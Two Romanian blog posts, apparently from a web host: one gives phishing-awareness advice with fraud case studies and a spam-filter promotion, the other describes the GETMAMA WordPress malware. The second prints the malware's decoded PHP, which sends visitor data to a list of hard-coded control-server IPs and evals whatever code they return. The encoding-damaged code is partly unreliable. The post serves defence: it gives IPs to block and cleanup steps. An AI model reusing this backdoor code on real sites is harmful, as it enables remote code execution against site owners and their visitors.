Cum sa va protejati angajatii si compania de atacurile phishing

Serviciul la distanta a devenit o parte bine cunoscuta a afacerii, milioane de angajati lucrand acum de acasa. Desi este o oportunitate pentru firme de a reduce birourile si de a oferi personalului o flexibilitate mai mare in ceea ce priveste modul in care lucreaza, este o schimbare care nu a trecut neobservata in mediul online, cu infractorii cibernetici, care tintesc rapid angajatii la domiciliu cu atacuri de phishing.

Ce sunt atacurile de tip phishing?

Un atac de tip phishing este in cazul in care un criminal cibernetic (hacker) vizeaza o afacere trimitandu-i un e-mail fals, pretinzand ca provine dintr-o sursa sigura.

Intr-un atac de acest tip, utilizatorului i se cere verificarea unor informatii si date personale. I se ofera un link de urmat, care ii duce catre un site web fals care seamana foarte mult cu cel real. Cand se conecteaza la site-ul fals, numele de utilizator si parola le sunt furate. Hackerul va folosi apoi acele acreditari pentru a obtine acces la sistemul companiei. De aici, atacatorul poate prelua identitatea utilizatorului pentru a fura bani, date sau pentru a efectua alte actiuni nedorite.

 

Instruirea personalului pentru identificarea e-mailurilor rau intentionate

Pe masura ce infractorii cibernetici devin din ce in ce mai sofisticati, devine mai dificil sa identificati e-mailurile de phishing. Instruirea personalului despre ceea ce trebuie sa caute si oferirea de memento-uri regulate poate reduce masiv riscul ca un atac sa aiba succes. Iata cateva dintre lucrurile cheie la care trebuie sa fiti atenti:

 

  • Salutari impersonale in loc sa se adreseze direct

 

  • Text incorect formulat si/sau logo-uri suspecte

 

  • Diferenta intre numele afisat si adresa de e-mail. In linia ‚ÄěDe la‚ÄĚ(From) a e-mailului dvs., veti avea urmatoarele informatii: Numele expeditorului <Adresa de e-mail a expeditorului>. Daca numele provine de la un expeditor recunoscut, dar adresa este complet diferita, probabil ca este un e-mail fals (de exemplu, cPanel Support <753alkbdj@email.com>).

 

  • Facturi, chitante, detalii de expediere pentru tranzactiile pe care nu le-ati efectuat

 

  • Atasamente in e-mailuri de la expeditori necunoscuti

 

  • Link-uri care, atunci cand treceti cu cursorul peste ele, va duc catre alte site-uri decat domeniul expeditorului. Pentru a le ascunde, unii folosesc adesea servicii populare de scurtare a linkurilor, cum ar fi Bitly. Afacerile autentice si de incredere nu ar avea niciun motiv sa faca astfel.

 

  • Solicitari de informatii personale sau financiare prin e-mail. Pentru a preveni ca clientii sa devina victime ale inselatoriilor de tip phishing, majoritatea companiilor nu le cer clientilor sa furnizeze date personale sau financiare prin e-mail. Inselatoriile de tip phishing o fac adesea.

 

  • Cereri pentru actiuni si plati urgente. Hackerii vor viza adesea victimele cerand actiuni/plati imediate sau plati pentru a preveni anularea sau suspendarea serviciilor. E-mailul contine de obicei un buton etichetat ‚ÄěActualizeaza acum‚ÄĚ, ‚ÄěPlateste acum‚ÄĚ etc., care redirectioneaza direct la site-ul hackerului.

 

Faceti navigarea mai sigura

Multe programe de antivirus si antimalware vin acum cu functii de navigare sigura pe care utilizatorii le pot folosi. Daca acestea sunt activate si cineva face clic pe un link suspect sau rau inten»õionat dintr-un e-mail de phishing, aceste programe pot identifica adesea site-ul ca fiind periculos si pot oferi utilizatorului un avertisment.

 

Ca afacere, poate fi util sa oferiti un software antivirus robust pentru angajatii dvs., si sa obtineti o licenta pentru mai multi utilizatori. In acest fel, va puteti asigura ca toti colegii au acelasi nivel de protectie, indiferent daca lucreaza de la distanta sau la birou si pe orice tip de dispozitiv pe care il folosesc pentru a va accesa sistemele.

 

Protejati-va adresele de email cu un filtru de spam

Utilizarea unui filtru de spam avansat, cum ar fi SpamExperts, poate reduce radical sansa de a deveni victima unui atac de tip phishing sau a unei infectii cu malware. Elimin√Ęnd 99,98% din spam-uri, SpamExperts foloseste tehnologia de auto-invatare pentru a identifica nu doar amenintarile existente, ci si pe cele noi, prevenind atacurile de phishing, spam, cu continut malitios/suspect sa ajunga in casutele postale ale angajatiilor.
Mai multe informatii gasiti aici.
In cazul in care sunteti interesati de acest serviciu profesional oferit de Clausweb, nu ezitati sa ne contactati pentru mai multe informatii.

 

Protejati conturile solicitand 2FA

Chiar daca un angajat isi introduce datele de logare intr-un site suspect in timpul unui atac de phishing, exista mult mai putine sanse ca ceva rau sa se intample daca aveti autentificare cu doi factori (2FA). Cu 2FA, nu numai ca cineva are nevoie de numele de utilizator si parola; vor avea nevoie si de un parola aditionala care se trimite pe telefonul angajatului. Daca atacatorul nu are acces la telefon, nu se va putea conecta. Deoarece parola functioneaza doar cateva minute, hackerii nu vor avea timp sa faca multe presupuneri ‚Äď mai ales daca firewall-ul va bloca utilizatorii, care genereaza prea multe erori de conectare intr-un interval scurt de timp.

 

Aparati-va impotriva phishingului intern prin e-mail

O inselatorie majora de phishing din ultimii ani si una destinata companiilor este trimiterea de e-mailuri interne false care se pretinde ca provin de la personalul superior. Acestea includ adesea instructiuni pentru a desfasura activitati care pun compania in pericol. Unii chiar au instruit echipele financiare sa transfere fonduri in conturile escrocilor.

 

Iata cateva dintre cele mai mari actiuni de tip phishing:

 

1.Crelan Bank, din Belgia, a fost victima unei escrocherii de phishing care a costat companiei aproximativ 75,8 milioane de dolari. Contul unui director de nivel inalt din cadrul companiei a fost compromis de pe care angajatii au fost intrsuiti sa transfere bani intr-un cont controlat de hackeri.

 

2.In 2015, Ubiquiti Networks, o companie de retele de calculatoare cu sediul in SUA, a fost victima unui atack asemanator.
Hackerul a furat identitatea directorului general si al avocatului companiei dupa care a instruit directorul contabil al companiei sa faca o serie de transferuri pentru a incheia o achizitie secreta. Pe parcursul a 17 zile, compania a efectuat 14 transferuri bancare catre conturi din Rusia, Ungaria, China si Polonia.
Incidentul a intrat in atentia companiei doar cand au fost notificati de FBI, legat de contul lor bancar din Hong Kong, care a ajuns victima unei fraude.

 

3.In ianuarie 2016, un angajat al producatorului austriac de piese aerospatiale FACC a primit un e-mail in care i-a cerut organizatiei sa transfere 42 de milioane de euro intr-un cont, ca parte a unui ‚Äěproiect de achizitie‚ÄĚ.Mesajul parea sa vina de la CEO-ul organizatiei, Walter Stephan, dar a fost de fapt o inselatorie.

4.Intre 2013 si 2015, doua dintre cele mai mari firme de tehnologie din lume au fost pacalite cu 100 de milioane de dolari dupa ce au cazut victimele unei escrocherii. Evaldas Rimasauskas, a observat ca ambele organizatii folosesc furnizorul taiwanez de infrastructura Quanta Computer. El a trimis o serie de facturi false de milioane de dolari care au replicat furnizorul pe parcursul a doi ani, complete cu contracte si scrisori care pareau sa fi fost semnate de directori si agenti ai Facebook si Google.

Inselatoria a fost in cele din urma descoperita, iar Facebook si Google au luat masuri legale, dupa care au recuperat putin sub jumatate din banii furati, in timp ce Rimasauskas a fost arestat.

5.In mai 2021, americanii au experimentat direct daunele pe care le pot provoca atacurile cibernetice, dupa ce furnizorul de combustibil Colonial Pipeline a fost victima unui atac ransomware. Organizatia a fost fortata sa opreasca operatiunile dupa ce reteaua de afaceri si sistemul de facturare au fost compromise.

Desi ransomware-ul a fost responsabil pentru mare parte din daune, atacatorii au putut sa planteze software-ul rau intentionat doar dupa ce au obtinut acces la parola unui angajat. Cel mai probabil printr-un e-mail de phishing.

Colonial Pipeline a platit hackerilor 4,4 milioane de dolari pentru cheia de decriptare.

Organizatia, care furnizeaza aproape jumatate din livrarile de petrol pe coasta de est a SUA, a fost inchisa timp de o saptamana, ceea ce a dus la nelivrarea a aproximativ 20 de miliarde de galoane de petrol.

Intre timp, peste 10.000 de benzinarii au ramas fara petrol chiar si la o saptamana dupa ce sistemele au revenit la normal.

 

Dupa cum demonstreaza aceste incidente, cel mai mare pericol cu ‚Äč‚Äčcare te confrunti cand vine vorba de phishing este daca angajatii tai nu pot detecta semnele unei escrocherii.

Milioane de e-mailuri de phishing sunt trimise in fiecare zi. Cand se intampla acest lucru, trebuie sa va puteti baza pe angajatii dvs. pentru a ramane vigilenti si a actiona responsabil.

Pentru a le ajuta sa faca acest lucru, organizatiile ar trebui sa ofere cursuri regulate de constientizare a personalului.

Angajatii tai stiu ce sa caute?

Pe cine contacteaza ei daca detecteaza un e-mail suspect?


GETMAMA – Un nou virus pe wordpress infecteaza fisierul XMLRPC.php

In lumea bloggerilor a intrat un nou virus numit GETMAMA, nu va lasati indusi in eroare de numele acestuia, este unul dintre cele mai complexe virusuri deoarece este bine codat, ceea ce il face greu de depistat sau de inlaturat. Acesta afecteaza doar unele site-uri web afisand ferestre pop up. Luati aminte, acest virus afecteaza fisierul XMLRPC.php printre altele si doar utilizatorii de Windows. Codul este afisat doar o data pe zi pentru un ip si atunci nu afiseaza la toata lumea codul cu problema.

Noul virus este descris ca fiind unul ‚Äúconditional‚ÄĚ deoarece, in momentul infectarii acesta trimite informatia inapoi catre atacatori si are optiunea de a infecta un site, de a rula o comanda sau chiar de a nu face nimic. Informatii precum adresa de IP si date despre utilizatorul ce acceseaza site-ul ajung la dezvoltatorii acestui virus, iar acestia pot hotara daca sa afiseze continutul malitios sau nu. Daca acest continut malitios este afisat, acesta va va aparea doar o singura data pe zi, prin intermediul adresei de IP si doar utilizatorilor de Windows.

Acest virus a fost decodat si expus pe blogul celor de la sucuri.net. Forma decodata nu arata deloc cu forma virusului pe care o veti intalni, aceasta fiind codata pentru a o face mai greu de depistat.

if¬†(!function_exists(„GetMama”)){

function¬†mod_con($buf){str_ireplace(„”,””,$buf,$cnt_h);if¬†($cnt_h¬†==¬†1)¬†{$buf¬†=¬†str_ireplace(„”,””¬†.¬†stripslashes($_SERVER[„good”]),$buf);¬†return¬†$buf;}str_ireplace(„”,””,$buf,$cnt_h);if¬†($cnt_h¬†==¬†1)¬†{$buf¬†=¬†str_ireplace(„”,stripslashes($_SERVER[„good”]).””,$buf);¬†return¬†$buf;}

return¬†$buf;}function¬†opanki($buf){$gz_e¬†=¬†false;$h_l¬†=¬†headers_list();if¬†(in_array(„Content-Encoding:¬†gzip”,¬†$h_l))¬†{¬†$gz_e¬†=¬†true;}if¬†($gz_e){$tmpfname¬†=¬†tempnam(„/tmp”,¬†„FOO”);file_put_contents($tmpfname,¬†$buf);$zd¬†=
gzopen($tmpfname,¬†„r”);$contents¬†=¬†gzread($zd,¬†10000000);$contents¬†=¬†mod_con($contents);gzclose($zd);unlink($tmpfname);$contents¬†=¬†gzencode($contents);}¬†else¬†{$contents¬†=¬†mod_con($buf);}$len¬†=¬†strlen($contents);header(„Content-Length:¬†„.$len);return($contents);}

function¬†GetMama(){$mother¬†=¬†„compromisedsite.com”;return¬†$mother;}

ob_start(„opanki”);

function¬†ahfudflfzdhfhs($pa){$mama¬†=¬†GetMama();$file¬†=¬†urlencode(__FILE__);if¬†(isset($_SERVER[„HTTP_HOST”])){$host¬†=¬†$_SERVER[„HTTP_HOST”];}¬†else¬†{$host¬†=¬†„”;}if¬†(isset($_SERVER[„REMOTE_ADDR”])){$ip¬†=¬†$_SERVER[„REMOTE_ADDR”];}¬†else¬†{$ip¬†=¬†„”;}if¬†(isset($_SERVER[„HTTP_REFERER”])){$ref¬†=¬†urlencode($_SERVER[„HTTP_REFERER”]);}¬†else¬†{$ref¬†=¬†„”;}if¬†(isset($_SERVER[„HTTP_USER_AGENT”])){$ua¬†=¬†urlencode(strtolower($_SERVER[„HTTP_USER_AGENT”]));}¬†else¬†{$ua¬†=¬†„”;}if¬†(isset($_SERVER[„QUERY_STRING”])){$qs¬†=¬†urlencode($_SERVER[„QUERY_STRING”]);}¬†else¬†{$qs¬†=¬†„”;}

$url_0¬†=¬†„http://”¬†.¬†$pa;
$url_1¬†=¬†„/jedi.php?version=0991&mother=”¬†.$mama¬†.¬†„&file=”¬†.¬†$file¬†.¬†„&host=”¬†.¬†$host¬†.¬†„&ip=”¬†.¬†$ip¬†.¬†„&ref=”¬†.¬†$ref¬†.¬†„&ua=”¬†.$ua¬†.¬†„&qs=”¬†.¬†$qs;
$try = true;

if(¬†function_exists(„curl_init”)¬†){$ch¬†=¬†curl_init($url_0¬†.¬†$url_1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
$try = false;}

if¬†((ini_get(„allow_url_fopen”))¬†&&¬†$try)¬†{$ult¬†=¬†trim(@file_get_contents($url_0¬†.¬†$url_1));$try¬†=¬†false;}

if($try){$fp¬†=¬†fsockopen($pa,¬†80,¬†$errno,¬†$errstr,¬†30);if¬†($fp)¬†{$out¬†=¬†„GET¬†$url_1¬†HTTP/1.0\r\n”;
$out¬†.=¬†„Host:¬†$pa\r\n”;
$out¬†.=¬†„Connection:¬†Close\r\n\r\n”;
fwrite($fp, $out);
$ret¬†=¬†„”;
while¬†(!feof($fp))¬†{$ret¬†¬†.=¬†¬†fgets($fp,¬†128);}fclose($fp);$ult¬†=¬†trim(substr($ret,¬†strpos($ret,¬†„\r\n\r\n”)¬†+¬†4));}}

if¬†(strpos($ult,”eval”)¬†!==¬†false)
{
$z¬†=¬†stripslashes(str_replace(„eval”,””,$ult));¬†eval($z);¬†exit();
}
if¬†(strpos($ult,”ebna”)¬†!==¬†false){$_SERVER[„good”]¬†=¬†str_replace(„ebna”,””,$ult);return¬†true;}
else {return false;}}

$father2[]¬†=¬†„78.46.173.14”;
$father2[]¬†=¬†„176.9.218.191”;
$father2[]¬†=¬†„91.228.154.254”;
$father2[]¬†=¬†„77.81.241.253”;
$father2[]¬†=¬†„184.82.117.110”;
$father2[]¬†=¬†„46.4.202.93”;
$father2[]¬†=¬†„46.249.58.135”;
$father2[]¬†=¬†„176.9.241.150”;
$father2[]¬†=¬†„46.37.169.56”;
$father2[]¬†=¬†„46.30.41.99”;
$father2[]¬†=¬†„94.242.255.35”;
$father2[]¬†=¬†„178.162.129.223”;
$father2[]¬†=¬†„78.47.184.33”;
$father2[]¬†=¬†„31.184.234.96”;
shuffle($father2);
foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}

Cam atatea au fost spuse de acest virus, iar in continuare va oferim cateva solutii ce va va ajuta sa scapati de el.Pentru a-l inlatura este indicat verificarea traficului urmatoarelor adrese de IP si, ulterior, blocarea lor.

78.46.173.14
176.9.218.191
91.228.154.254
77.81.241.253
184.82.117.110
46.4.202.93
46.249.58.135
176.9.241.150
46.37.169.56
46.30.41.99
94.242.255.35
178.162.129.223
78.47.184.33
31.184.234.96

O alta alternativa este oferita pe site-ul edeir.ro si propune urmatoarea solutie, instalarea plugin-ului wordfence ce va efectua o scanare. Daca va depista ca fisierul XMLRPC.php a fost modificat sau oricare alt fisier de la wordpress inseamna ca ati fost infectat de acest virus. Stergeti fisierele respective, cautati ultima versiune de wordpress, in acesta veti gasi toate fisierele orginale care trebuie incarcate pe server. Exista un singur inconvenient, veti pierde orice personalizare facuta, dar veti elimina cu siguranta acest virus, desi exista sanse ca el sa revina daca aveti alte brese de securitate in difeirte teme sau pluginuri instalate.

Multa bafta in eliminarea virusului!